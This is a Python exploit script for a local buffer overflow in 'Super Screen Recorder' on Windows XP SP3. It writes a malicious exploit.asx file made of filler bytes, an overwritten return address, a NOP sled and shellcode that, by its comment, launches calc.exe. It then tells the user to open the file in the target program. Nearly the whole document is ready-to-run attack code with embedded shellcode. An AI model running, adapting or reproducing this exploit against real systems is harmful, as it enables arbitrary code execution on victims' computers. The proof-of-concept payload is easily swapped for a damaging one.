#!/usr/bin/python # # Title: Super Scrren Recoder Local Buffer Overflow # Author: Angel Injection # Date: 9/9/2011 # Tested on: Windows XP SP3 # Thanks To: Inj3ct0r Team , Sec-krb.org Team # Grups Inj3ct0r: http://www.facebook.com/groups/Inj3ct0r.Team/ # Greets To: My friend " SeeMee " # # windows/exec - 228 bytes # EXITFUNC=seh, CMD=calc.exe # shellcode = ("\xda\xd6\xbe\xc4\x14\x6b\x17\x31\xc9\xd9\x74\x24\xf4\x58\xb1" "\x33\x83\xe8\xfc\x31\x70\x14\x03\x70\xd0\xf6\x9e\xeb\x30\x7f" "\x60\x14\xc0\xe0\xe8\xf1\xf1\x32\x8e\x72\xa3\x82\xc4\xd7\x4f" "\x68\x88\xc3\xc4\x1c\x05\xe3\x6d\xaa\x73\xca\x6e\x1a\xbc\x80" "\xac\x3c\x40\xdb\xe0\x9e\x79\x14\xf5\xdf\xbe\x49\xf5\xb2\x17" "\x05\xa7\x22\x13\x5b\x7b\x42\xf3\xd7\xc3\x3c\x76\x27\xb7\xf6" "\x79\x78\x67\x8c\x32\x60\x0c\xca\xe2\x91\xc1\x08\xde\xd8\x6e" "\xfa\x94\xda\xa6\x32\x54\xed\x86\x99\x6b\xc1\x0b\xe3\xac\xe6" "\xf3\x96\xc6\x14\x8e\xa0\x1c\x66\x54\x24\x81\xc0\x1f\x9e\x61" "\xf0\xcc\x79\xe1\xfe\xb9\x0e\xad\xe2\x3c\xc2\xc5\x1f\xb5\xe5" "\x09\x96\x8d\xc1\x8d\xf2\x56\x6b\x97\x5e\x39\x94\xc7\x07\xe6" "\x30\x83\xaa\xf3\x43\xce\xa0\x02\xc1\x74\x8d\x04\xd9\x76\xbe" "\x6c\xe8\xfd\x51\xeb\xf5\xd7\x15\x0d\x07\xea\x83\x99\xbe\x9f" "\xe9\xc4\x40\x4a\x2d\xf0\xc2\x7f\xce\x07\xda\xf5\xcb\x4c\x5c" "\xe5\xa1\xdd\x09\x09\x15\xde\x1b\x6a\xf8\x4c\xc7\x43\x9f\xf4" "\x62\x9c\x55"); junk = "\x41" * 670 eip = "\x43\x25\x75\x9E" nops = "\x90" * 20 junk2 = "\x41" * 3636 try: file = open('exploit.asx','w'); file.write(junk+eip+nops+shellcode+junk2); file.close(); print "\n[+] exploit.asx created." print "[+] Open superscreen.exe..." print "[+] and drag and drop exploit.asx.\n" except: print "\n[-] Error.. Can't write file to system.\n"